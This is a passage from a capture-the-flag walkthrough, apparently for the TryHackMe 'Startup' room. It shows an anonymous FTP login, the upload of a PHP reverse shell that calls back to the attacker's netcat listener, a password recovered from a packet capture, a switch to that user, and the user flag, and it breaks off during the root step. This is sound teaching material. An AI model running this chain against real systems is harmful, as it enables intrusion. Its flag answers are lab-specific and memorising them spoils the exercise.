$ ftp anonymous@10.10.96.227
Connected to 10.10.96.227.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Note that the password for anonymous login is anonymous.
Let's look around a bit.
ftp> ls
229 Entering Extended Passive Mode (|||62019|)
150 Here comes the directory listing.
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
226 Directory send OK.
ftp> cd ftp
250 Directory successfully changed.
We can upload a reverse shell in this directory.
We will be using the /usr/share/webshells/php/php-reverse-shell.php script after making some modifications.
We replaced the IP address with our tun0 address and set the port to a port of our choice.
Let's upload the file to the FTP server using put.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||50625|)
150 Ok to send data.
100% |***********************************************************************************************************************************************************************************************| 5494 2.27 MiB/s 00:00 ETA
226 Transfer complete.
5494 bytes sent in 00:00 (19.80 KiB/s)
Now we have to listen on the 9999 port using netcat.
$ nc -nlvp 9999
listening on [any] 9999 ...
Let's go to the /files/ftp folder.
All we have to do now is execute the php-reverse-shell.php file.
If we go back to our console, we must have a shell.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.96.227] 37428
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
06:33:05 up 42 min, 0 users, load average: 0.00, 0.00, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We can stabilize the shell using the following commands:
www-data@startup:/$ ls
bin home lib mnt root srv vagrant
boot incidents lib64 opt run sys var
dev initrd.img lost+found proc sbin tmp vmlinuz
etc initrd.img.old media recipe.txt snap usr vmlinuz.old
Here, the recipe.txt file seems interesting. We can read it using the cat command.
www-data@startup:/$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
Answer
love
Question
What are the contents of user.txt?
We have to go to the /incidents directory.
www-data@startup:/incidents$ ls
suspicious.pcapng
Let's copy the suspicious.pcapng file to the ftp directory.
www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp/
www-data@startup:/incidents$ ls /var/www/html/files/ftp/
php-reverse-shell.php suspicious.pcapng
Let's look at the ftp login.
ftp> ls
229 Entering Extended Passive Mode (|||32073|)
150 Here comes the directory listing.
-rwxrwxr-x 1 112 118 5494 Dec 06 06:28 php-reverse-shell.php
-rwxr-xr-x 1 33 33 31224 Dec 06 06:55 suspicious.pcapng
226 Directory send OK.
We can now download this file using the get command.
ftp> get suspicious.pcapng
local: suspicious.pcapng remote: suspicious.pcapng
229 Entering Extended Passive Mode (|||41055|)
150 Opening BINARY mode data connection for suspicious.pcapng (31224 bytes).
100% |***********************************************************************************************************************************************************************************************| 31224 118.42 KiB/s 00:00 ETA
226 Transfer complete.
31224 bytes received in 00:00 (79.21 KiB/s)
We can now use Wireshark to analyze the packet capture.
In frame 45 we can see that the user has entered some commands.
Let's Follow > TCP Stream.
The password for the lennie user is c4ntg3t3n0ughsp1c3.
www-data@startup:/$ su lennie
Password:
lennie@startup:/$
We can now go to /home/lennie and get the flag.
lennie@startup:/$ cd /home/lennie/
lennie@startup:~$ ls
Documents scripts user.txt
lennie@startup:~$ cat user.txt
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Answer
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Question
What are the contents of root.txt?
Let's check what's inside the scripts/ directory.
lennie@startup:~$ cd scripts/
lennie@startup:~/scripts$ ls
planner.sh startup_list.txt
We can check what the planner.sh file is doing using cat.